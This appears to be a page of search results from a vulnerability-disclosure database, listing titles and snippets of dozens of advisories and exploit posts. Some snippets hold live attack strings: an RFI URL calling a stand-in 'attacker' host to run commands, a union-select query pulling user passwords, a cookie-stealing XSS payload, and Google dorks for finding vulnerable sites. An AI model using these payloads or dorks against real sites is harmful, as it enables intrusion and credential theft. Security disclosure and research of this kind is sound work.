47153 matches found
TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability
TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/TPTI-07-15.html September 17, 2007 -- CVE ID: CVE-2007-4827 -- Affected Vendor: Automated Solutions -- Affected Products: Modbus RTU/ASCII/TCP Slave ActiveX...
PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.1.6 / 4.4.4 Critical phpadmin bypass by inirestore Author: Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 05.09.2006 - - Public: 09.09.2006 SecurityAlert Id: 42 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 = x...
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability
Title: ====== Knowledge Base EE v4.62.0 - SQL Injection Vulnerability Date: ===== 2012-09-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: ===== 702 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: =============...
iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability iCube Lab productdetails.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.icubelab.com/ Persian Gulf 4 Ever! Dork : "Powered by iCube Lab"...
Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability
.: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | / / :. . ..: ||| / .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: o9.o8.2oo6 .. Affected Application: Remository v3.25 Mambo/Joomla CMS Component . . : contact :...
Python buffer overflow
socket.recvfrominfo buffer overflow...
Opencart Multiple Vulnerabilities
Title: Opencart Multiple Vulnerabilities Vendor: http://www.opencart.com Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure Vulnerable Version: opencart 1.5.6 prior versions also may be affected Exploitation: Remote with browser Impact: High Vendor Supplied Patch: N/A Original Advisory...
XSS Vulnerabilities in 1024cms Admin Control Panel v1.1.0 Beta
================================================================================================================ 1024cms Admin Control Panel v1.1.0 Beta Complete-Modules Package - Cross-Site Scripting Vulnerability...
PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PCVmedia freegallery.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.pcvmedia.com/ Persian Gulf 4 Ever! Dork : "Website designed & developed by PCVmedia.com"...
Bug in Opera and Konqueror
/----------------+--------------------------------------+------------- | sp00fed packet | | advisory 2 | +----------------+--------------------------------------+-------------+ | Product: multiply vendors browsers | | Vulnerability: buffer overflow | | Danger: low |...
Security Advisory FreeBSD-SA-01:29.rwhod
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:29 Security Advisory FreeBSD, Inc. Topic: rwhod allows remote denial of service Category: core Module: rwhod Announced: 2001-03-12 Credits: Mark Huizer [email protected]...
Conserver Overflow
This overflow is trivial to fix and I've already emailed the developer, but I'm curious to know if it would be at all possible to exploit this overflow. In conserver-GNAC-6.15 in the source for the conserver daemon: group.c line 376: ------------------------- int CheckPasswdpCLServing, pwstring...
VMware Tools Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity:...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
2245
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2245-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano May 29, 2011 http://www.debian.org/security/faq -...
[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability
ADVISORY INFORMATION Title: Oracle E-Business Suite SQL injection Advisory ID: ERPSCAN-15-026 Advisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/ Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class:...
Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
Document Title: =============== Microsoft HTA HTML Application - Remote Code Execution Vulnerability MS14-064 References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1576 Video: http://youtu.be/Vkswz7vt23M...
[SECURITY] CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags
CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags Severity: Important Vendor: The Apache Software Foundation Versions Affected: Standard Taglibs 1.2.1 The unsupported 1.0.x and 1.1.x versions may also be affected. Description: When an application uses x:parse or x:transform tags to...
Microsoft Excel DoS
NULL pointer dereference on corrupted XML/XLS files...
Remote Command Execution in guestserver.cgi + exploit
Remote Command execution vulnerability in Lars Ellingsen's guestserver.cgi found at http://www.guestserver.com/ Exploit code at bottom. by: fish stiqz [email protected] Overview: From http://www.stud.ntnu.no/larsell/guestbook/: Guestserver is a guestbook system that enables you to have your own...
TELUS Security Labs VR - Oracle Java Web Start Command Argument Injection Remote Code Execution
Oracle Java Web Start Command Argument Injection Remote Code Execution TSL ID: TSL20120214-01 1. Affected Software Oracle Java Development Kit JDK 6 Update 30 and prior Oracle Java Development Kit JDK 7 Update 2 and prior Oracle JavaFX 2.0.2 and prior Oracle Java Runtime Environment JRE 6 Update ...
pmwiki: persistent cross site scripting (XSS), CVE-2010-1481
pmwiki: persistent cross site scripting XSS, CVE-2010-1481 References https://vulners.com/cve/CVE-2010-1481 http://int21.de/cve/CVE-2010-1481-pmwiki-xss.html Description The table feature of pmwiki is vulnerable to persistent cross site scripting XSS. The value of the width-parameter is not...
Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability
Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability DoRk:"Powered by Coppermine Photo Gallery" Vuln. code: requireonce"$sourcedir/Load.php";requireonce"$sourcedir/Security.php"; Exploit: www.server.com/path/bridge/yabbse.inc.php?sourcedir=Sh3LL Author:Ma$tEr-0F-De$a$t0r...
Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644)
Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution 958644 Published: October 23, 2008 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in the Server service. The...
BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability
--------------------------------------------------------------------------- BinGoPHP News = 3.01 bnrep Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team : hTTp://RST-CREW.net : Remote : Yes...
Update on CVE assigned for Wordpress Plugin Simple Gmail Login
Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace Error URL- http://wordpress.org/extend/plugins/simple-gmail-login/ Author- Aditya Balapure Link - http://adityabalapure.blogspot.in/ CVE Assigned- CVE-2012-6313. Description Once you have installed this plugin you can login to...
XSS in PrestaShop
Advisory ID: HTB23091 Product: PrestaShop Vendor: PrestaShop, Inc. Vulnerable Versions: 1.4.7, 1.4.8 and probably prior Tested Version: 1.4.7, 1.4.8 Vendor Notification: May 9, 2012 Public Disclosure: August 29, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-2517...
HP Network Node Manager remote console weak files permissions
Weak permissions for C:Program FilesHP OpenView allows executable files and system service file spoofing...
UBB.threads >= 6.4.x Remote File Inclusion
Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...
FreeCHAT DoS
No description provided...
PHP 5.2.4 mail.force_extra_parameters unsecure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.2.4 mail.forceextraparameters unsecure Author: Maksymilian Arciemowicz cXIb8O3 SecurityReason Date: - - Written: 06.09.2007 - - Public: 0x.0x.2007 SecurityReason Research SecurityAlert Id: 47 CVE: CVE-2007-3378 SecurityRisk: Medium Affected...
IrfanView DoS
Program hangs on corrupted WMF files open...
Unreal ircd ip cloacking protection bypass
To hide real IP hash of IP address with simple hashing algorithm is used...
[email protected]
Title: ====== ePhoto Transfer v1.2.1 iOS - Multiple Web Vulnerabilities Date: ===== 2013-07-17 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1017 VL-ID: ===== 1017 Common Vulnerability Scoring System: ==================================== 6.6 Introduction: ============...
Microsoft Windows Explorer DoS
Application explorer.exe crashes on browsing folder with corrupted WMF file no need to click file itself...
S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
ID: S21SEC-003-en Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 Date: 03/04/2000 Status: Vendor contacted Scope: Remote command execution as superuser Platforms: Linux, probably others Author: llmora, fjserna Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt Release: Public...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Memory corruptions, headers injection, restrictions bypass...
[Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit
This one is the same offset as dwa7w and the same class id as inotes6. Basically inotes6 and inotes6w share the same class id, except that inotes6w is unicode. dwa7w is unicode and has a different class id. Code is inline, I would attach it except for the fact that I set off way to many av scanne...
Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)
Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service 893066 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
XSS и SQL Injection уязвимости в CMS WebManager-Pro
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и SQL Injection уязвимостях в CMS WebManager-Pro это украинская коммерческая CMS. XSS WASC-08: http://site/index.php?word=2220onMouseOver=alertdocument.cookie20 SQL Injection Authentication Bypass WASC-19: На странице...
Meta Cart Free Database Disclosure
Meta Cart Free Database Disclosure AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download : http://www.metalinks.com/metacart.htm DORK : "Powered by MetaCart" Bug...
zenTrack Remote Command Execution Vulnerabilities
Subject: zenTrack Remote Command Execution Vulnerabilities Author: farking [email protected] Product: zenTrack 2.4.1 latest and below Vendor: http://zendocs.phpzen.net/zentrack / http://sourceforge.net/projects/zentrack/ Status: Vendor contacted 27/05/2003 Location:...
ESA-2012-025: EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities
ESA-2012-025.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-025: EMC NetWorker Module for Microsoft Applications NMM Multiple Vulnerabilities. EMC Identifier: ESA-2012-025 CVE Identifier: CVE-2012-2284,CVE-2012-2290 Severity Rating: See below for individual severity scores EMC...
Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Alfazeta list-prodotti.php?idcategoria AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.alfazeta.net/ Persian Gulf 4 Ever! Dork : inurl:list-prodotti.php?idcategoria=...
Microsoft Internet Explorer saved pages crossite scripting
Crossite scripting in context of local machine is possible on saving URL with address like http://site/--scriptalert"XSS"/script...
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability http://www.zerodayinitiative.com/advisories/ZDI-07-018.html April 18, 2007 -- CVE ID: CVE-2007-2137 -- Affected Vendor: IBM -- Affected Products: IBM Tivoli Monitoring Express 6.1 -- Vulnerability Details: This...
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
-------------------------------- PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...